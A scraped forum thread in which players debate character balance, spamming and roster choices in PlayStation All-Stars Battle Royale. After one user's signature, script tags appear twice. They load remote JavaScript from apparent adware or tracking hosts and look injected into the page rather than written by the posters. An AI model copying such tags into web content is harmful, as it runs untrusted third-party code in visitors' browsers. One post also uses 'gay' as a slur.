Showing results for 
Search instead for 
Do you mean 
Gaming Beast
2167 posts

Re: This community. I can't even.

Apr 11, 2013
While I agree with the general premise, some of the character OP/UP comes is based on the actual character. For example, anyone saying Radec ISN'T underpowered compared to someone like Good Cole is either in denial or not good enough to understand the gap between these characters.

Now I am a Big Daddy/Good Cole main. It is rather blatantly obvious that one of my mains is FAR superior to the other.

Big Daddy: no projectiles, unsafe on block, no movement options, few KCs, drops framerate, level 2 glitches a LOT, very few combos, lots of disables (But some of them glitch quite a bit).

Good Cole: One of the best escape moves in the game (Ice jump and grind), great ranged game and stage control (Redirect rockets, grenades, freeze missile, ice block, tether), no blind spots, can burst off of any stray hits, can kill off of almost every move in his moveset, amazing supers, great AP gain, amazing grab which can lead to a burst, safe on block, easily transitions from ranged to melee, able to store numerous level 1s, etc.

Objectively speaking, Cole is just an all around better character.

What's more, people complain about spamming because some characters were more designed to spam than others. Take Isaac for example. His moveset works best when used to camp a corner with a mine in front of you. The mine keeps you safe, and you can use all of your other moves to either combo off of the mine or punish someone for trying to destroy the mine.

Similarly Good Cole's moveset works together in such a way that running away and spamming all game is actually effective with him. I personally think it's a waste of his amazing potential and really **bleep** boring, but it's also a legit strategy because of how his moveset is made. They gave him amazing stage control, projectile that disable and interrupt combos, all giving good AP and allowing you to combo off of them, incredible tools for putting distance between yourself and opponents... It's little surprise you see so many people spam with him, especially since they buffed his level 3!

So yeah, you can blame the players for playing like that, but really it's also the game's fault for rewarding those play styles.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Please use plain text.
Message 51 of 73 (136 Views)
0 Likes
Sackboy
425 posts

Apr 11, 2013

Radec is my main online. I pick him over 90%of the time. I spam his sniper rifle move a lot. Why? Because it works. He is a long ranged character, so I will get away from the others since I cant fight up close and he doesnt have good combos. But he does have plenty of great up close special attacks, and I can blow everyone away with the shotgun. It works even better with the slow characters on big maps when they take a while to get to me, and when they do I run to the other side. I can do alright facing Raiden and Kratos, since if Im far away, why should I care about their OP sword and chain attacks? He also has my favorite level one. After only five shots, I can still be in the same spot and fire a shot from 20 yards away and still get a kill. Oh, and lets not forget his level two, which also travels across the whole map, and makes for an easy triple kill if you can get close enough.

I don't hear anyone calling Radec OP. I also don't hear anyone calling Radec UP. I am somewhat skilled with him. Yet, he has 2 major faults and many major advantages. Surely, he is a good target for shouting OP all the time right? nope. Maybe we should start blaming players. I feel so sorry for Kratos.

Please use plain text.
Message 52 of 73 (120 Views)
0 Likes
Lombax Warrior
113 posts

Apr 11, 2013
That's what I'm saying. Even Radec can be amazing because he has some of the best supers. But definitely blame the player not the character. Good cole is an overall better character, but if a pro is using Radec he can win.
Please use plain text.
Message 53 of 73 (111 Views)
0 Likes
Lombax Warrior
200 posts

Apr 11, 2013

KomodoBrothers wrote:
"Omg this character killed me therefore they are OP DEMAND NERF" "I lost with this character therefore they are underpowered DEMAND BUFF" "Unrealistic character suggestion/moveset!" Did I miss any? Honestly it gets tiresome reading the same thing. Stop complaining about every character and stop suggesting stupid things just because you are a fan of it.

My first point. Yes, some players can be annoying. But don't blame the character, blame the person spamming with them! Poor Kratos gets all this hate when it is the player that should be getting it. Kratos, and other "spammers", CAN be used without mashing that square button. I've seen some very skilled Kratos users who barely use square attacks.

Second point. Unrealistic character suggestions. Anime characters, characters from unpopular games, and just plain stupid suggestions. Goku, Naruto, Shadow, etc. You actually have to think about it from SSM's perspective. People already think they copied Smash Bros. Do you seriously think they will add Shadow when SSBB had Sonic? And I shouldn't even explain why anime characters shouldn't be in this game. Last thing, they obviously dont listen to our suggestions. I doubt anyone wanted Kat, Emmett, or Zeus. But they were added because they managed to get those ones, not because they were frequently requested.

Anyone agree? Disagree? Sorry for the rant but you people need to pull it together.

That is a good point, but we have raiden when SSBB has snake.

Please use plain text.
Message 54 of 73 (110 Views)
0 Likes
Sackboy
526 posts

Apr 11, 2013
fully agree with OP

I used to be a solid kratos player and use his square moves as often as ALL his other moves. I dropped him as a character because of all the hate he got. now all he does is sit there doing nothing with his 999 rank. couldnt agree with you more on nerfs/buffs. they dont need balancing, the player needs learning and practise

and lol at second point. anyone who requests something that isnt represented MAINLY by Sony then they can get out lol. characters like abe and heihachi are acceptable since they helped grow the history of PS. but yeah, dragon ball, marvel, sega, most of the animes, etc.... really people??

Click the picture for my Tombi Blueprint Thread!! :smileyhappy:

HTML tutorial

Please use plain text.
Message 55 of 73 (101 Views)
0 Likes
Lombax Warrior
113 posts

Apr 11, 2013
Maybe they did not realize, I haven't heard them get any crap for that though. Because Raiden has his own game. But if they add Shadow they WILL get crap
Please use plain text.
Message 56 of 73 (101 Views)
0 Likes
Lombax Warrior
200 posts

Apr 11, 2013

Well sega isn't owned by Nintendo.

Please use plain text.
Message 57 of 73 (98 Views)
0 Likes
Gaming Beast
1823 posts

Apr 11, 2013

FaunKeH_5 wrote:
and lol at second point. anyone who requests something that isnt represented MAINLY by Sony then they can get out lol. characters like abe and heihachi are acceptable since they helped grow the history of PS. but yeah, dragon ball, marvel, sega, most of the animes, etc.... really people??

You can go ahead and take Sega off that list: they gave Sony Yakuza and Valkyria Chronicles (back in 2008 when the PS3 wasn't doing that well). They've earned their place in our history.

I like to make PSASBR move-sets. Here's a few:

Dart.jpg Daedalus.png Selvaria.jpg Alicia.png Dante.png Ellen.jpg

Never say I don't contribute: I'm The Idea Man.

Community Move-Set for Specter. Help build it.

Please use plain text.
Message 58 of 73 (91 Views)
0 Likes
Gaming Beast
2167 posts

Apr 11, 2013

KomodoBrothers wrote:
That's what I'm saying. Even Radec can be amazing because he has some of the best supers. But definitely blame the player not the character. Good cole is an overall better character, but if a pro is using Radec he can win.
Not against pro Good Coles. Trust me, this has been tested. Watch Kmart play; he's by far the best Radec player, but even he's given up and gone to Isaac for some players/characters because against an evenly skilled opponent, Radec can't cut it against a lot of the cast.

A more obvious example would be Isaac vs Raiden, where Raiden literally can't do anything to an Isaac camping the corner: http://youtu.be/Lisz_KQd5D4

This is a match between high level players, but it's played really really gayly because the character was designed in such a way that it's the best option. That sounds more like a flaw with the game than with the player. The player is playing to win; that just happens to mean playing really really gay.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Please use plain text.
Message 59 of 73 (72 Views)
0 Likes
Fender Bender
2536 posts

Apr 11, 2013

KomodoBrothers wrote:

Poor Kratos gets all this hate when it is the player that should be getting it. Kratos, and other "spammers", CAN be used without mashing that square button. I've seen some very skilled Kratos users who barely use square attacks.

Anyone agree? Disagree? Sorry for the rant but you people need to pull it together.

I think the fact that a person CAN find great success at a character by only pressing one button is a little absurd. If you made it so that it wasn't so easy to find success by mashing square then I would be fine with Kratos. Give his square moves more cooldown and make them slower so he can be punished easier. As it is now, he has the ability with one button to punish easily and prevent people from punishing him. If it was easier to punish his square moves, everyone would be happier.

Please use plain text.
Message 60 of 73 (70 Views)
0 Likes